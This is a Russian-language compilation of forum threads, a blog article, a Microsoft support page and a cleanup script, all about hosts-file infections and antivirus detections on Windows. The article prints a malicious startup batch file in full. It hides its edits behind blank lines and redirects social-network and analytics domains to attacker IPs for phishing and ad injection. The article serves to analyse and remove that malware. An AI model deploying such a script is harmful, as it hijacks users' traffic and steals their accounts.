Если вы видите это сообщение, значит, произошла проблема с загрузкой файлов в стилей (CSS) нашего сайта. Попробуйте сбросить кэш браузера (Ctrl+F5).
Если это не поможет, а вы находитесь в регионе, где возможны ограничения интернет-трафика с российских серверов — воспользуйтесь VPN.
|
2 раза запускала. 1-ый раз полную проверку, второй раз только диск С. После 1-ой удалила все, кроме 1-ой. Я нажала пропустить. Вдруг драйвера слетят? Угроза-вирус с системной папке, вдруг не вирус? C:\WINDOWS\system32\drivers\etc\hosts Что это за файл вообще? Драйвер? Почему с первого раза утилита все не нашла? Почему после 2-го раза она не нашла первый файл, который я пропустила? 
C:\WINDOWS\system32\drivers\etc\hosts — там часто вирусы вносят свои записи (это не драйвер). Как-то у меня антивирус Dr.Web Security Space обнаружил в файле hosts вирусные записи — я нажал — обезвредить и вирусные записи из файла hosts удалились (сам файл остался), вообще-то Dr.Web не должен удалять файл hosts а только лечить его от вирусных записей. автор вопроса выбрал этот ответ лучшим Maste 8 лет назад Да, вирусы и угрозы найденные Утилитой Доктором Веб лучше удалить, или если есть такая возможность вылечить зараженные файлы, судя по скрину у вас в вопросе среди зараженных нет важных файлов удаление которых могло бы негативно сказаться на работе компьютера, потому постарайтесь вылечить, а если не получится удаляйте. Мираб 9 лет назад Никакой это не драйвер. Вирусы любят прописывать свои пути в файле hosts, и тогда могут не открываться какие-то сайты, а может быть вместо них откроются окна, похожие на настоящий сайт, но будет написано, что сайт заблокирован и без смс с вводом деньг не разблокируется. Злоумышленники так делают обычно с сайтами одноклассники, вконтакте и др. Вирусы надо удалять, утилита Доктор Веб не трогает сам файл hosts, а удаляет из него вредоносные записи. Главное самому не удалить папку etc. И не трогать файл hosts, если не знаете, что с ним делать. Может быть второй раз утилита не нашла файл с вирусом, потому что запомнила, что его надо пропустить. Надо запустить еще раз полную проверку. Помощ 8 лет назад Я бы вам советовал при обнаружении угроз антивирусом, в первую очередь поинтересоваться в Интернете что именно вы собираетесь удалить. Часто некоторые программы вступают в конфликт с антивирусом и их необходимо заносить в исключения. Возможно, у вас аналогичный случай. Если же по компьютеру явно видно, что вирус уже внутри (появляется реклама в браузерах, он тормозит), значит вероятно вирус заразил и маскируется под безопасной программой. В таком случае удаляйте. alexm 10 лет назад Ни в коем случае. Люди старались работали писали вирусы, забрасывали их на ваш компьютер для каких-то своих целей. А вы хотите их вот так просто взять и удалить? Уважайте чужой труд. Пусть найденные вирусы отошлют своим создателям ваши пароли на разные аккаунты и другую вашу личную информацию. Помогите создателям вирусов «ломать» другие компьютеры. владс 8 лет назад Сами вирусы обнаруженные Доктором Веб нужно конечно удалить. Потом, позовите того, кто умеет лечить файлы, так как эта работа, требует особых знаний и умений. Если файлы нельзя реанимировать, то тогда, все надо удалять и чистить, а то комп, будет все равно барохлить. maste 8 лет назад Файл hosts очищать не следует, если знаете, что ничего лишнего в нем нет, а имеются только добавленные вами записи, чтобы не слетали активации программ или блокировались какие-то адреса. А вот остальное удалять можно, конечно если уверены в том, что делаете, поскольку эта утилита и нормальные программы может подозревать в заражении вирусами. Можно смело удалять, то что вас смутил путь в папке с драйверами C:\WINDOWS\system32\drivers\etc\host, на этом и рассчитывали создатели вредоносного кода,но так как вы пропустили данную угрозу, следующий раз антивирус просто её пропустит, необходимо найти данный файл в карантине или в исключениях ( в меню самого антивируса) и удалить. Совсе 7 лет назад Вирусы очень часто прописываются в файле Hosts, так как он находится в системной папке и в нее легко проникнуть. Поэтому всё то, что при проверке находит доктор веб необходимо удалять. Разработчики антивирусов создают свои программы так, чтобы они не удаляли нужные и файлы, в том числе и драйвера. Любые угрозы и вирусы — обнаруженные антивирусной программой НУЖНО удалять… я много лет пользовался антивирусом dr.web и ни разу никакие драйвера у меня не слетали… так что можете смело удалять всё- что им обнаружено… Знаете ответ? |
Легкое проникновение или борьба с несложным вирусом
Время на прочтение3 мин
Количество просмотров5.7K
Захватывающее действие разворачивается на Вашем компьютере совсем неожиданно и, как правило, в самый неподходящий момент. Начинается все просто, Вы отправляетесь на свой любимый сайт или в социальную сеть и обнаруживаете что-то необычное…
Так случилось и с моим компьютером. Захожу на сайт, вижу в левом углу неприличную картинку (рекламный баннер). В голове промелькнуло 2 мысли:
- заражен мой браузер
- заражен сайт
Побродив по нескольким сайтам и не увидев этого самого баннера, я сделал вывод, что все-таки заражен сайт. Так как это был сайт довольно крупной компании, я позвонил в тех. поддержку. Выслушали, выразили благодарность за бдительность, но во время разговора сообщили, что у них этот баннер не отображается ни под одним браузером.
Анализ сайта
Начал исследовать сайт, и вижу, что в коде Яндекс метрики есть такая строчка:
<noscript><div><img src="//mc.yandex.ru/watch/image2.jpg" style="position:absolute; ..." alt=""></div></noscript>
Именно она и показывает баннер. Не совсем понятно, как это делается в теге , однако ясно, что ссылка на картинку фишинговая.
Файл hosts
Отправляемся в файлик hosts (%windir%\system32\drivers\etc\hosts).
И вот тут мной была допущена серьезная ошибка: открыл, посмотрел, все число, закрыл. Однако не обратил внимания на появившуюся полосу прокрутки.
Автозагрузка
Отправляемся в автозагрузку (Пуск->Выполнить->msconfig) и обнаруживаем там файлик start.bat со следующим содержимым:
FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txtСтановится понятно, первая строка батника в hosts создает 255 пустых строк. Именно поэтому, заглянув в hosts я ничего не увидел. Нужно было отправиться в самый конец, чтобы заметить модификацию.
Таким образом, на всех сайтах, на которых стоял Google Analytics и Яндекс метрика, появлялся этот рекламный баннер. А во всех социальных сетях подкладывался фишинговый сайт, где можно было легко предоставить доступ к своей страничке «неприятелю».
Стоило удалить из автозапуска батник, почистить hosts, как все встало на свои места. Способ проникновения вредителя на компьютер так и остался загадкой.
Заключение
Во всей этой истории удивительным остается следующее:
- На компьютере стоял антивирус Касперского, который не подавал никаких признаков борьбы с модификацией файла hosts, добавлением батника в автозагрузку и появлением баннера (даже после полной проверки).
- ОС Windows 7 совершенно спокойно разрешала исполнять start.bat при каждой загрузке.
#1
Danya_Dark
- Posters
- 67 Сообщений:
Newbie
Отправлено 11 Январь 2018 — 12:55
Время от времени выскакивает сообщение от др.веба, что был обезврежен вирус hosts с угрозой DFH.hosts.corrupted по пути …windows/system32/drivers/etc/ .
Прочитал в интернете про вирус. В самом hosts нет подозрительных строчек.
# Copyright © 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# This HOSTS file cured by Dr.Web Anti-rootkit API
# unchecky_begin
# These rules were added by the Unchecky program in order to block advertising software modules
# unchecky_end
# This HOSTS file cured by Dr.Web Anti-rootkit API
Что с ним делать? Кстати говоря, в карантине ничего нет.
Это стало кстати происходить после переустановки Windows. Прям в первый день.
Сообщение было изменено Danya_Dark: 11 Январь 2018 — 13:00
- Наверх
#2
Dr.Robot
Dr.Robot
- Helpers
- 3 342 Сообщений:
Poster
Отправлено 11 Январь 2018 — 12:55
1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,
Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ — сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.
2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,
— попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
— детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
— дождаться ответа аналитика или хелпера;
3. Если у Вас зашифрованы файлы,
Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.
Что НЕ нужно делать:
— лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
— переустанавливать операционную систему;
— менять расширение у зашифрованных файлов;
— очищать папки с временными файлами, а также историю браузера;
— использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из «Аптечки сисадмина» Dr. Web;
— использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.
Что необходимо сделать:
— прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба — это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];
4. При возникновении проблем с интернетом, таких как «не открываются сайты», в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа «Содержание сайта заблокировано» и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig
Для этого проделайте следующее:
- Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить…
- В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
- Напишите в этом черном окне команду ipconfig /all>»%userprofile%\ipc.log» и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,»%userprofile%\ipc.log» и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
- Приложите этот файл к своему сообщению на форуме.
Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.
- Наверх
#3
VVS
VVS
- Moderators
- 19 787 Сообщений:
The Master
Отправлено 11 Январь 2018 — 13:10
А это что у Вас за программы?
20180111.084155 .313 [3252] [CL,BG] C:\windows\system32\drivers\etc\hosts - Ok (2,4K 64/37ms 62KB/s) [C:\program files (x86)\unchecky\bin\unchecky_svc.exe:1248:32] {NT AUTHORITY\система:NT AUTHORITY\система}
2018-Jan-11 08:46:55.790132 [4984] [INF] [bg-scan] Start new scan session 1 2018-Jan-11 08:47:04.523574 [4984] [INF] [event-manager] process_virus 2018-Jan-11 08:47:04.617174 [4984] [WRN] [bg-scan] scan result C:\Windows\system32\drivers\etc\hosts infection: DFH:HOSTS.corrupted (type: 1; code: 8) 2018-Jan-11 08:47:43.410610 [4984] [WRN] [bg-scan] scan result C:\Program Files (x86)\AnVir Task Manager\anvirlauncher.exe infection: Program.Unwanted.1331 (type: 8; code: 2049)
меня вот что возмутило. что даже не начинают толком диалог сразу дампы…… © alehas777
———————————
Антивирус это как ремень безопасности — всего лишь увеличивает шансы выжить или получить менее тяжкую травму при аварии.
Есть, однако, категория людей, которые рассматривают средства безопасности как ауру неуязвимости. © basid
- Наверх
#4
Danya_Dark
Danya_Dark
- Posters
- 67 Сообщений:
Newbie
Отправлено 11 Январь 2018 — 13:13
А это что у Вас за программы?
20180111.084155 .313 [3252] [CL,BG] C:\windows\system32\drivers\etc\hosts - Ok (2,4K 64/37ms 62KB/s) [C:\program files (x86)\unchecky\bin\unchecky_svc.exe:1248:32] {NT AUTHORITY\система:NT AUTHORITY\система}2018-Jan-11 08:46:55.790132 [4984] [INF] [bg-scan] Start new scan session 1 2018-Jan-11 08:47:04.523574 [4984] [INF] [event-manager] process_virus 2018-Jan-11 08:47:04.617174 [4984] [WRN] [bg-scan] scan result C:\Windows\system32\drivers\etc\hosts infection: DFH:HOSTS.corrupted (type: 1; code: 8) 2018-Jan-11 08:47:43.410610 [4984] [WRN] [bg-scan] scan result C:\Program Files (x86)\AnVir Task Manager\anvirlauncher.exe infection: Program.Unwanted.1331 (type: 8; code: 2049)
Я без понятия. Мне винду мастер ставил. Решил ничего не трогать.
- Наверх
#5
phantom83
phantom83
- Posters
- 715 Сообщений:
Advanced Member
Отправлено 11 Январь 2018 — 13:20
Мне винду мастер ставил
еще пойди и не лицензия, а деньги взял наверно за работу, по рукам бы таким мастерам.
Я без понятия
если не знаете для чего это ПО и не пользуете его, то сносите, а то и что ни будь натворите с его помощью.
Сообщение было изменено phantom83: 11 Январь 2018 — 13:21
- Наверх
#6
Danya_Dark
Danya_Dark
- Posters
- 67 Сообщений:
Newbie
Отправлено 11 Январь 2018 — 13:24
Мне винду мастер ставил
еще пойди и не лицензия, а деньги взял наверно за работу, по рукам бы таким мастерам.
Я без понятия
если не знаете для чего это ПО и не пользуете его, то сносите, а то и что ни будь натворите с его помощью.
Вообще сломался ноутбук. Сказал что жд сломался. Настроил новый жд и переустановил винду.
Удалил эти две проги. Так что насчёт проблемы?
Сообщение было изменено Danya_Dark: 11 Январь 2018 — 13:25
- Наверх
#7
VVS
VVS
- Moderators
- 19 787 Сообщений:
The Master
Отправлено 11 Январь 2018 — 13:35
Так что насчёт проблемы?
А она ещё есть?
меня вот что возмутило. что даже не начинают толком диалог сразу дампы…… © alehas777
———————————
Антивирус это как ремень безопасности — всего лишь увеличивает шансы выжить или получить менее тяжкую травму при аварии.
Есть, однако, категория людей, которые рассматривают средства безопасности как ауру неуязвимости. © basid
- Наверх
#8
Danya_Dark
Danya_Dark
- Posters
- 67 Сообщений:
Newbie
Отправлено 11 Январь 2018 — 13:40
Я не знаю. др.веб сам же ловит hosts время от времени. Или же эти программы были причиной проблемы?
- Наверх
#9
VVS
VVS
- Moderators
- 19 787 Сообщений:
The Master
Отправлено 11 Январь 2018 — 13:52
А она ещё есть?
Я не знаю. др.веб сам же ловит hosts время от времени. Или же эти программы были причиной проблемы?
C большой вероятностью да.
меня вот что возмутило. что даже не начинают толком диалог сразу дампы…… © alehas777
———————————
Антивирус это как ремень безопасности — всего лишь увеличивает шансы выжить или получить менее тяжкую травму при аварии.
Есть, однако, категория людей, которые рассматривают средства безопасности как ауру неуязвимости. © basid
- Наверх
#10
Danya_Dark
Danya_Dark
- Posters
- 67 Сообщений:
Newbie
Отправлено 11 Январь 2018 — 13:55
А она ещё есть?
Я не знаю. др.веб сам же ловит hosts время от времени. Или же эти программы были причиной проблемы?
C большой вероятностью да.
Ну, хорошо. Если что, отпишусь здесь, но надеюсь это не понадобится. Спасибо.
Сообщение было изменено Danya_Dark: 11 Январь 2018 — 13:55
- Наверх
#11
S____K____R
S____K____R
- Posters
- 219 Сообщений:
Member
Отправлено 14 Январь 2018 — 19:25
Danya_Dark,
А это что у Вас за программы?
Первая из упомянутых не должна быть проблемой. Сам пользуюсь очень давно. Полезная штуковина. Совсем кроха, но работу свою делает грамотно.
Сообщение было изменено S____K____R: 14 Январь 2018 — 19:27
Мир больше не будет прежним… 安全達人
- Наверх
#12
S____K____R
S____K____R
- Posters
- 219 Сообщений:
Member
Отправлено 14 Январь 2018 — 19:34
Danya_Dark, после тщательного изучения описания этой проги обнаружилось следующее:
ВАЖНО! Unchecky вносит изменения в системный файл hosts, прописывая защиту от загрузки ПНП, с несколько десятков основных вредоносных ресурсов, распространяющих ПНП. Вы можете отключить внесение изменений, поставив галочку в меню Расширенные настройки для «Не использовать правила hosts файла».
Поэтому беру свои слова обратно. У меня-то галочка стоит.
Сообщение было изменено S____K____R: 14 Январь 2018 — 19:38
Мир больше не будет прежним… 安全達人
- Наверх
Applies ToWindows 8 Windows 8 Pro Windows 8 Enterprise
Symptoms
Consider the following scenario:
-
You install Windows 8.
-
You change the Hosts file by specifying custom IP-address-to-host-name mappings to prevent users from browsing to some websites.
-
You run a scan in Microsoft Windows Defender.
Cause
This issue occurs because Windows Defender may determine incorrectly that the Hosts file was changed by malware, such as adware or spyware. Typically, malware programs change the Hosts file to redirect users to malicious websites. Therefore, Windows Defender may detect the Hosts file as a security threat.
Resolution
To resolve this issue, exclude the Hosts file from scanning in Windows Defender. To do this, follow these steps:
-
Open Windows Defender.
-
On the Settings tab, click Excluded files and locations.
-
Under File locations, click Browse.
-
Locate and then click the Hosts file.
Note By default, the Hosts file is located in the %systemroot%\system32\drivers\etc folder.
-
Click Add, and then click Save changes.
-
Exit Windows Defender.
References
For more information about the SettingsModifier:Win32/PossibleHostsFileHijack malware threat, go to the following Microsoft Malware Protection Center encyclopedia entry:
SettingsModifier:Win32/PossibleHostsFileHijack
For information about how to reset the Hosts file to the default settings, click the following article number to go to the article in the Microsoft Knowledge Base:
972034 How can I reset the Hosts file back to the default?
Need more help?
Want more options?
Explore subscription benefits, browse training courses, learn how to secure your device, and more.
C:\Windows\system32\drivers\etc\hosts — infected with HOSTS:MALWARE.URL
C:\Windows\system32\drivers\etc\hosts — infected — 0ms, 0 bytes
Судя по файлу hosts Cureit реагирует именно на эти записи:
109.94.209.70 www.fitgirl-repack.org # Fake FitGirl site
# 109.94.209.70 fitgirlrepacks.pro # Fake FitGirl site # cured by Dr.Web
# 109.94.209.70 www.fitgirlrepacks.pro # Fake FitGirl site # cured by Dr.Web
109.94.209.70 fitgirlrepack.games # Fake FitGirl site
и запуском игры эти записи в hosts восстанавливаются, пробуйте после очистки и перезагрузки системы не запускать игру, и проверить что покажет Cureit.
Выполните в uVS скрипт из буфера обмена.
ЗАпускаем start,exe от имени Администратора (если не запущен)
текущий пользователь,
Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.
В главном меню выбираем «Скрипт — выполнить скрипт из буфера обмена»
Скрипт автоматически очистит систему и перезагрузит ее.
Скрипт ниже:
;uVS v4.15.1 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------
delref %SystemDrive%\USERS\MORIBAND\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\NPDPPLBICNMPOIGIDFDJADAMGFKILAAK\10.8_0\SAVEFROM.NET ПОМОЩНИК
delall %SystemDrive%\PROGRAM FILES (X86)\WZWBJIESVQUSC\EWCFITC.DLL
delall %SystemDrive%\PROGRAM FILES (X86)\RJOCCCYVU\ULKRWB.DLL
delall %SystemDrive%\PROGRAM FILES\WPROXY\WINPROXY\WINPROXY.EXE
delref HTTPS://F.A.K/E
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DGNDELHFHCFBDHNDFPCINEBIJFCJPMPEC%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DHNCJFOEMLKDANJHJHJPIGPLMKAKGGGAE%26INSTALLSOURCE%3DONDEMAND%26UC
apply
deltmp
delref %SystemDrive%\PROGRAM FILES (X86)\JOTTJFNBKVBLCLKKCZR\LOENANG.DLL
delref %SystemDrive%\PROGRAMDATA\JEMWJPQOOPHZLLVB\RXHQHTD.WSF
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {6BF52A52-394A-11D3-B153-00C04F79FAA6}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %SystemDrive%\AUTOSETTINGSPS
delref %Sys32%\SPPEXTCOMOBJHOOK.DLL
delref %Sys32%\SPPEXTCOMOBJPATCHER.EXE
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
delref %SystemDrive%\RIOT GAMES\RIOT CLIENT\RIOTCLIENTSERVICES.EXE
;-------------------------------------------------------------
regt 35
regt 14
restart
После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату что с детектами происходит после скрипта.